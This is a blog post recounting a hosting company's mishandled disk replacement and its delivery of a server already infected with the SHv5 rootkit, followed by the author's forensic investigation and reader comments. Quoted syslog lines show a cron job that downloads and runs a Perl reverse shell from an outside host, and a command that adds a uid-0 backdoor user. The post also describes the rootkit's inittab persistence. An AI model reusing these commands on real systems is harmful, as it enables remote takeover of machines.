Epic fail from a hosting company involving bad customer support and a critical security issue

To cut a long story short: someone rents a few dedicated servers at a big hosting company, and I occasionally do some administrative tasks for him.
One of the servers stopped responding and was unbootable on October 1st; one disk had crashed. The hosting company then made a huge mistake, I notified them about it, and the next day, October 2nd, they made an even bigger one (a security issue). I re-notified them about it…
So you can either read the whole story or, if you are only interested in the security issue, skip the first day and go straight to October 2nd.

Some details: the server had two disks, sda with the OS (Debian 4.0 with the Plesk control panel) and sdb, which held some backup files.

October 1st 2009:
10:10 I got a telephone call asking me to help with that server because it looked dead and couldn’t even be rebooted from the hosting company’s control panel.
10:15 I contacted the company’s support by email and notified them of the problem.

10:23 I got an email saying that the engineers would take a look at the problem as soon as possible.
11:01 I got another email from an engineer telling me that he would take a look at the server and would keep me updated on the issue.
11:36 I got the following email:

There is something wrong with either the drive or the drives drivers.
While booting it gives strange errors that the drive is busy and cant be
accessed. After rebooting it gives me a bootdisk failure.

I will run some tests on the drive to see if it is faulty. If so I will
update you and replace the drive.

This all is regarding the first drive ‘sda’.

I hope to have informed you sufficient. When I know more I will update you.

11:59 Another email from tech support:

I would like to update you about the following.

After trying to do some tests the only result I have is that the drive
can’t be found by my harddrive checking software. This usually indicates
that the drive is faulty.

I hope you have all your data back-upped or you have it on the second
disk (which seems to be fine).

I will replace the harddrive for you and reinstall your system.

When this is done I will update you. If you have any questions or
suggestions before I replace the drive please let me know.

I hope to have informed you sufficient.

12:08 I replied:

You have informed me more than sufficiently…unfortunately though you
didn’t have any good news to tell me…

I have backups offline, and I might even have some on the second disk
as far as I can remember. So just re-install Debian with Plesk on it
and I will import back my settings.

Thanks a lot for your time and work, I really appreciate it

14:41 New email from tech support:

I would like to inform you about your server XXX.

Fortunately i have good news for you! Because you (seem to have) used your harddrive in a
raid-1 configuration, i was able to replace the broken harddrive. After this i was able to
succesfully boot your machine. After checking: the new harddrive is being recognized and it
is ready to use.

Hope to have informed you sufficiently. If you have any further questions do not hesitate to
contact us again.

Now, THAT was strange. There was no raid-1 config on the drives. The machine was pingable and I could ssh to it. I entered the box and found myself on the old sda drive, but with a totally different sdb disk attached. It was a disk with another installation inside, from someone else who had a raid-1 config. I can only guess that tech support somehow mixed up the disks between his box and “my” server, so I got his second raid-1 disk. sda was _NOT_ changed! That meant that the “backup” disk was gone but sda was working. I quickly created a backup dir on sdb and rsync-ed the whole of sda to it; sdb had just a basic install inside, with only 3GB out of 80GB used. Some files were corrupt though, and S.M.A.R.T. reported errors from time to time while copying.
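
For reference, the emergency copy amounted to roughly the following; this is a minimal sketch rather than the exact commands I ran, and the device and mount-point names are illustrative (assuming the new sdb carried one big usable partition):

# mount the (new, mostly empty) sdb and mirror the failing sda onto it
mount /dev/sdb1 /mnt/backup
rsync -aH --numeric-ids \
      --exclude=/proc --exclude=/sys --exclude=/dev --exclude=/mnt \
      / /mnt/backup/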

15:23 I emailed them back to notify them that they did not actually change sda

The box might be up but the disk (sda) is in a very bad condition.
S.M.A.R.T checks report this
Oct 1 14:09:04 XXX smartd[2889]: Device: /dev/sda, 1 Offline
uncorrectable sectors

I can’t use mysql as well, it reports broken tables. I can restore the
tables from backup but I would need a good working disk to do that.

From the following 2 diagrams I can see that you replaced sdb and not sda.
http://XXX/munin/YYY/XXX-smart_sda.html
http://XXX/munin/YYY/XXX-smart_sdb.html

Can you please let me know of what changed ? I got confused.
If possible please call me at +555-1234 or +5555-5678 for details

16:52 Email response from tech support:

Regarding your server XXX, I would like to inform you with the following.

It indeed looks like we replaced the wrong drive for you. Since I read
you have offline backups. I would like to replace both harddrives in
your server.

Please let us know if we can replace both drives and reinstall your
server from scratch.

If you have any other questions, don’t hesitate to contact us again.

17:05 I replied:

Since you have replaced sdb already I took another system backup on
that disk in order to save bandwidth and precious time.

What I would like from you to do is to see whether you can take an
exact image of “sda” to another 80Gb disk and put that new sda disk on
the machine to boot (probably using a disk imaging tool or linux dd
command). That would save both you and me looooots of time since I
would just have to replace the damaged files on the system and you
don’t have to re-install.

If imaging sda fails, then you can resort back to re-installing.

To help you identify the drives:
sda is Western Digital:
=== START OF INFORMATION SECTION ===
Model Family: Western Digital Caviar SE (Serial ATA) family
Device Model: WDC WD800JD-75MSA1
Serial Number: WD-XXXXXXXXXXXX
Firmware Version: 10.01E01
User Capacity: 80,000,000,000 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 7
ATA Standard is: Exact ATA specification draft version not indicated
Local Time is: Thu Oct 1 16:03:19 2009 CEST
SMART support is: Available – device has SMART capability.
SMART support is: Enabled

and sdb is Maxtor:
=== START OF INFORMATION SECTION ===
Model Family: Maxtor DiamondMax Plus 9 family
Device Model: Maxtor 6Y080M0
Serial Number: YYYYYYYYYY
Firmware Version: YAR51HW0
User Capacity: 80,000,000,000 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 7
ATA Standard is: ATA/ATAPI-7 T13 1532D revision 0
Local Time is: Thu Oct 1 16:04:08 2009 CEST
SMART support is: Available – device has SMART capability.
SMART support is: Enabled

Please leave Maxtor (sdb) as it is!

I deliberately did not tell them that sdb held another customer’s installation, because I wasn’t sure they would be able to bring back my old sdb. If they couldn’t, I would have to transfer all the backup data I had offline over the net, which would surely take far longer than copying from disk to disk. If they left the new sdb on the box, though, I could easily copy most of the system to the “new” sda once they put it in, and only restore the corrupted files.

18:05 New email from tech support:

In reply to your email, I would like to inform you with the following.

One of our engineers will try making an image of sda to a new disk as
soon as possible. The engineer will update you about the progress.

If you have any qeustions in the meantime, don’t hesitate to contact us

October 2nd
09:52 New email from tech support:

I would like to inform you on this ticket.

Your server was re-installed with Debian last night.
This morning I have completed the Plesk install.

Server details:

– XXX
– IP: AA.BB.CC.DD
– Password (root): ABCDEFGHIJK

Plesk Details:

– Plesk 8.6
– https://AA.BB.CC.DD:8443
– Password (admin):LMNOPQRSTU

If you need any further support on this ticket, please inform us.

This is a really bad policy. Sending an email with root login details is totally unacceptable by my security standards, and I usually don’t nag about security _that_ much. But an email with the root password? Come oooon…

Anyway, I started the restore procedure from sdb to sda. At about 12:00 everything was mostly working again. At about 14:00 I had this brilliant idea to upgrade the kernel. The box had 2.6.18-6-486 so I decided to install 2.6.24-etchnhalf.1-686. The output of apt-get install linux-image-2.6.24-etchnhalf.1-686 was a bit weird though. It contained these lines among others:
Searching for splash image ... none found, skipping ...
/bin/ls: invalid option -- v
Try `/bin/ls --help' for more information.

ls did not have a “-v” option? That couldn’t be right… I issued an ls -v manually:
# /bin/ls -v
/bin/ls: invalid option -- v
Try `/bin/ls --help' for more information.
# /bin/ls --version
ls - GNU fileutils-3.1

GNU fileutils? I went to check /bin/ls on another Debian 4.0 box; ls -v worked there, and I also got:

# ls --version
ls (GNU coreutils) 5.97
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software.  You may redistribute copies of it under the terms of
the GNU General Public License <http://www.gnu.org/licenses/gpl.html>.
There is NO WARRANTY, to the extent permitted by law.

Written by Richard Stallman and David MacKenzie.

I checked /mnt/backup/bin/ls (on the sdb drive where I had taken the backup of the previous sda). It correctly reported the coreutils 5.97 version.
I started thinking that something was totally wrong with the installation, so I tried to reinstall coreutils. Then I got a new set of errors:
unable to make backup link of `./bin/ls' before installing new version: Operation not permitted

Ok…I knew by then that this was BAD. The machine was probably hacked and had some type of rootkit installed. I just wanted to make sure.
# lsattr /bin/ls
s---ia------- /bin/ls
# lsattr /bin/ps
s---ia------- /bin/ps
# lsattr /sbin/ifconfig
s---ia------- /sbin/ifconfig
# lsattr /bin/netstat
s---ia------- /bin/netstat
# lsattr /usr/bin/md5sum
s---ia------- /usr/bin/md5sum

Helloooo rootkit. The files had the following extended attributes set:
a: A file with the ‘a’ attribute set can only be opened in append mode for writing. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.
i: A file with the ‘i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.
s: When a file with the ‘s’ attribute set is deleted, its blocks are zeroed and written back to the disk.
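
Those flags are also why dpkg got “Operation not permitted” when it tried to replace /bin/ls: as long as the immutable bit is set, not even root can overwrite the file. A minimal clean-up sketch, for illustration only since the box was going to be wiped anyway (the package names are the standard Debian owners of those binaries):

# clear the secure-delete/immutable/append-only flags the rootkit set
chattr -sia /bin/ls /bin/ps /bin/netstat /sbin/ifconfig /usr/bin/md5sum
# then reinstall the packages that own those binaries
apt-get install --reinstall coreutils procps net-tools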

Using the ps executable from /mnt/backup/bin/ps, I was able to check the process list for things that did not appear when using the trojaned /bin/ps.
I diff-ed the output of the two ps commands and here’s the result:

root      2695  0.0  0.0   2064   512 ?        Ss   10:59   0:00 /sbin/ttyload -q
root      2697  0.0  0.0   1692   568 ?        S    10:59   0:00 ttymon tymon
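
The comparison itself was nothing fancy; roughly the following, assuming bash for the process substitution and /mnt/backup as the mount point of the backup of the old system:

# trusted ps from the backup vs. the trojaned /bin/ps on the live system
diff <(/mnt/backup/bin/ps aux) <(/bin/ps aux)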

I opened /sbin/ttyload in vim and saw, among the headers:
^@$Info: This file is the propert of SH-crew team designed for test purposes. $
^@$Nr: SH- April/2003 produced in SH-labs for Linux Systems.Run and enjoy. $

A netstat -anp using /mnt/backup/bin/netstat showed ttymon listening on a raw socket (raw:1).
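
For anyone who wants to check the same thing, the raw-socket listeners can be listed with a trusted netstat, or read straight out of /proc so that no userspace binary has to be trusted at all:

/mnt/backup/bin/netstat -anp | grep '^raw'   # trusted binary, not the trojaned one
cat /proc/net/raw                            # the kernel's own raw-socket table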

But how was ttymon loaded at startup?
Inside /etc/inittab I found the following:
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload

/usr/sbin/ttyload contained the following:
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
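
A quick way to spot this kind of persistence on a sysvinit system is to list the non-comment, non-getty entries of /etc/inittab; on a stock Debian 4.0 install nothing surprising should be left after filtering those out:

grep -v '^#' /etc/inittab | grep -v getty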

With Google’s help I was able to identify the installed rootkit as SHv5.

OK, so the server was hacked and it contained a rootkit, but how did the attacker manage to compromise it? I started checking the logs, syslog first of course, using /mnt/backup/usr/bin/less /var/log/syslog. Among other useless things I saw the following entries:
Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21227]: (root) CMD (cd /var/ && rm -rf prs2.pl && wget http://QQ.RR.EE.TT:64891/prs2.pl && perl prs2.pl && echo main.c)
Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21229]: (root) CMD (/usr/sbin/useradd -d /usr/local/psa/plesk -g root -G root -s /bin/sh -p "9XRcZIXmTrZ/6" plesk-root && /usr/sbin/usermod -u 0 -o plesk-root)

So there was a crontab entry which downloaded a file and ran it, and another crontab entry which created a new user called plesk-root with uid 0.
I downloaded the prs2.pl file; it was a Perl reverse shell. It’s apparent that whoever did this already had access to the box at 08:23 in order to install the crontab entries; remember that I was only given access to the box by the email sent at 09:52.
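
Those CMD lines come out of root’s crontab, so the cron spool and drop-in directories are another obvious place to inspect on a box you don’t trust (these are the standard Debian paths):

crontab -u root -l                        # root's crontab, as cron sees it
ls -la /var/spool/cron/crontabs/          # the spool files behind user crontabs
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/   # system-wide drop-ins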

That made me FURIOUS. I can’t stress “furious” with enough boldness… only a <blink> tag could show how mad I was with tech support at the time.

I notified the guy who had asked me to take a look at the server and we decided that I would go to his office to call the hosting company’s tech support on the phone. While driving I also called a friend to ask him about raw-socket listening details… (thanks, man).

I arrived at his office, showed him my findings, and we called tech support. I tried to explain to the nice lady who picked up the phone that I had a serious security issue with a dedicated server and that I wanted to speak to the specific engineer who had installed the server; I knew his name from the emails. Instead of being put through to that engineer, I was transferred to another guy. I gave him the ticket number and he put me on hold for 10 minutes while he read the ticket. He then came back and I told him to log in to the box. He said he couldn’t. I told him that I had changed the sshd port to XXX, but he said he still could not log in. I told him to use ssh -p XXX root@IP, but again he said he couldn’t log in. He also asked me to reset the root password to the one they had sent by email. I couldn’t stand him much longer, so I told him I would do it, that I would send him the exact login details by email, and that he should call me back immediately after receiving the email. And so I did.

15:53 I sent the tech support the following email:

ssh -p 222 root@AA.BB.CC.DD
the password is: ABCDEFGHIJK

telephone number: +5555-3456

Nothing happened. They neither called me nor logged into the box.

16:10 I sent another email…and I was angry…really angry

what’s taking you so long…I told you this is an important security
issue on your side and you had me 10minutes on call waiting…You told
me you couldn’t connect with ssh (??) and I mailed you back the login
details and still nothing happens after another 15 minutes.

Not even an attempt to login to the box. Please call me at
5555-3456 as soon as possible.

16:32 The phone rang and an engineer told me he had finally logged into the box and was waiting for my instructions on what to look at. At that moment I was writing a new email to them, so I sent it to him, told him to read it, and said I would then show him more details. This is what I sent:

The following excerpt from syslog clearly show that the machine was
compromised _before_ you gave it to me…

Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21227]: (root) CMD (cd /var/ &&
rm -rf prs2.pl && wget http://195.67.149.70:64891/prs2
.pl && perl prs2.pl && echo main.c)
Oct 2 08:23:01 IQS002 /USR/SBIN/CRON[21229]: (root) CMD
(/usr/sbin/useradd -d /usr/local/psa/plesk -g root -G root -s /bin/
sh -p “9XRcZIXmTrZ/6” plesk-root && /usr/sbin/usermod -u 0 -o plesk-root)

I entered the machine at 9:30. This is the output of last command:
root pts/0 ppp-94-68-80-4.h Fri Oct 2 09:29 – 10:33 (01:04)
root pts/0 85.17.130.250 Fri Oct 2 08:30 – 09:03 (00:33)

At first he denied that it was their problem. Then I started almost shouting on the phone and told him to pay attention to the timestamps. I also told him about the attributes of the trojaned files (ls, ps, netstat, etc.)… He finally apologized, said that this was a terrible error on their side, and that he would forward the ticket to a dedicated security group inside tech support for further investigation.

16:50 I received another call: they had found out that their Plesk installation script “used a default password while installing”, which the attacker took advantage of to gain access to Plesk, after which he could of course do anything he wanted. He apologized again and asked me what I wanted to do. I told him I wanted them to replace sda again with a new disk and re-install Debian and Plesk carefully. I made it clear that I didn’t want them to even touch sdb. I also told him that I needed about 30 minutes to take backups from the disk, and we agreed that I would send them an email when I was ready.

I didn’t actually need to take a backup of the system; I already had the backup on the sdb drive. What I really wanted was to collect as much evidence of the rootkit as possible and see whether the attacker had left anything else on the box. I couldn’t find much, so I just gathered some of the trojaned executables, plus the ttymon and ttyload files, put them in a tarball and copied it to sdb.
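
The evidence gathering was nothing more than something along these lines (the tarball name and destination path are illustrative; the three files are the ones mentioned above):

# reading the files works fine; the rootkit's flags only block modification
tar czf /mnt/backup/shv5-evidence.tar.gz \
    /sbin/ttyload /sbin/ttymon /usr/sbin/ttyload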

17:11 I sent them an email:

As we agreed please proceed in re-installing the system on sda leaving
sdb _as it is_.

17:48 Email from tech support:

In reply to your email, I would like to inform you with the following.

I’ll start the installation as soon as possible. And I will inform you
about the progress.

If you have any questions in the meantime, don’t hesitate to contact me
again.

Again, nothing happened for hours and hours…

22:01 I sent them a new email:

Hello,
I was told on the phone that the installation would take place today.
I still can’t see anyone shutting down the box and re-installing
it…is someone taking care of this ticket ?

October 3rd
02:47 I finally received an email from tech support:

I would like to update you on the status of your ticket.

I apologise for the delay with the reinstallation of your server. I will
begin the reinstall shortly.

I will keep you informed.

03:33 I reply:

This issue is getting harder and harder to solve by the hour, first
you change the wrong disk, then you hand me a compromised box and now
I get this big delay…
This should have been a priority ticket at least since the security
incident. I think we deserved some more attention…

04:17 I got a reply:

Thank you for your mail. I would like to update you on the status of
your server.

I am in the process of reinstalling your server. All that remains is to
complete the Plesk installation. I am doing my best to complete this for
you as soon as possible.

I will inform you once the process is complete.

06:13 A new email from tech support:

I would like to update you on the status of your server.

XXX has been reinstalled with Debian 4 32-bit and Plesk 8.6. The
details are as follows:

LOGIN
IP Address: AA.BB.CC.DD
Password: ABCDEFG

PLESK
Url: https://AA.BB.CC.DD:8443
Username: admin
Password: KLMNOPQR

Please do not hesitate to contact us if you require any further assistance.

Before copying any files from sdb to sda, this time I first checked the server with ls -v…

Some notes as a conclusion:
i) This is the worst customer support I’ve seen to date. I’ve opened tickets with that hosting company before, even for similar cases like replacing disks, a motherboard and RAM, and I always got first-class customer support. This makes me think that the specific engineers who handled my ticket are the root of the problem, and not the tech support team as a whole. Should I call their supervisor and notify him explicitly about the problem they created, or should I just try to forget about them?
ii) It really strikes me as odd that the attacker knew the exact time and IP of the box within seconds of the Plesk installation. I know this might sound like a conspiracy theory, but there’s a chance that the engineer who handled the first installation was somehow involved with the attack; maybe his own box is compromised by the attacker. The two installations were done by a different engineer each time. In fact, the guy who did the first installation never responded to any further emails on the ticket; it was probably handed off to other engineers.
iii) Never, ever trust a box you’ve been handed to be safe and secure. At least I won’t, ever again. An automated attack doesn’t take more than a few seconds. Don’t use any of your passwords on a new box, and don’t ssh from it to anywhere else before you’ve made sure there’s nothing wrong with it (a quick checklist sketch follows these notes). I was lucky this time because I didn’t connect to any other server, but from now on this will be a “policy” for me.
iv) How stupid is it to send a cleartext email containing the root password and the IP of a box? The hosting company has a control panel secured by HTTPS with a valid certificate; they should use that control panel to provide new login details to customers. Sending cleartext login details by email is totally unacceptable as a hosting company policy.
v) I think the owner of the box deserves some refund from the hosting company. The guy pays quite a lot of money for this dedicated box and the others; they delayed him, and if I hadn’t been careful enough he could have been handed a trojaned box and kept using it for a long, long time. They could also have thanked me for what I told them: their installation scripts were bad/faulty/compromised/whatever, and there could be a dozen or a hundred other infected boxes at that hosting company right now. I don’t want to go public with the name of the hosting company yet, since it’s still early and it’s the weekend, but if they don’t do something in the next couple of days I think I should. What do you people think about this?
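
To make point iii a bit more concrete, the kind of five-minute check I have in mind before trusting a freshly delivered box is roughly the following sketch (debsums is an optional Debian package, so it may need installing first):

# immutable/append-only flags on core binaries are a classic rootkit giveaway
lsattr /bin/ls /bin/ps /bin/netstat /sbin/ifconfig /usr/bin/md5sum
# verify installed files against the package md5sums
apt-get install debsums && debsums -s
# anything odd started from inittab, or listening on the network?
grep -v '^#' /etc/inittab | grep -v getty
netstat -anp | grep -E 'LISTEN|^raw'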

Files: i) prs2.pl
ii) SHv5 rootkit: just google for shv5.tar.gz…you’ll get lots of sources.

References: a) http://forums.debian.net/viewtopic.php?p=160255
b) http://www.linuxforums.org/forum/linux-security/47606-shv4-shv5-rootkit-installed.html
c) http://www.jigsawboys.com/2008/06/01/lead-story-test/
d) http://www.hacker-soft.net/tools/Papers/redhat-compromise.pdf (thanks to the guy with the raw socket details :))

6 Responses to “Epic fail from a hosting company involving bad customer support and a critical security issue”


  2. October 4th, 2009 | 16:48

    I don’t want to be evil or pedantic here, but I think that you should at least send an email and report this to the tech manager. Maybe tech support had a bad day, or you found the only guy who was not able to pay attention; however, if you pay for a service and you don’t get it, you should at least *say something*.

    It’s part of the Greek culture to consider *reporting* a problem worse than the actual problem.


  4. mmc
    October 13th, 2009 | 12:19

    As President of the Committee for the Liberation and Integration of Trolls and their Re-introduction Into Society I object to your generalization.

  5. Hossam
    October 16th, 2009 | 10:00

    About ii) It really strikes me as odd that the attacker knew the exact time and IP of the box at the seconds of the Plesk installation. I know this might sound like a conspiracy theory, but there’s a good chance that the engineer who handled the first installation was somehow involved with the attack.

    I can assure you that this is a conspiracy theory indeed. There is a security vulnerability within Plesk, at least in version 8.2, as once I installed it on a fresh new server it got hacked exactly the same way in a matter of hours. I can’t think of anything other than hackers widely scanning port 8443 to find the vulnerability and exploit it.

  6. April 7th, 2010 | 23:13

    Could you tell which hosting company was it?

    I had *exactly* the same issue (infection) with Godaddy virtual server – as I got it provisioned, it was already infected, in a way you describe.
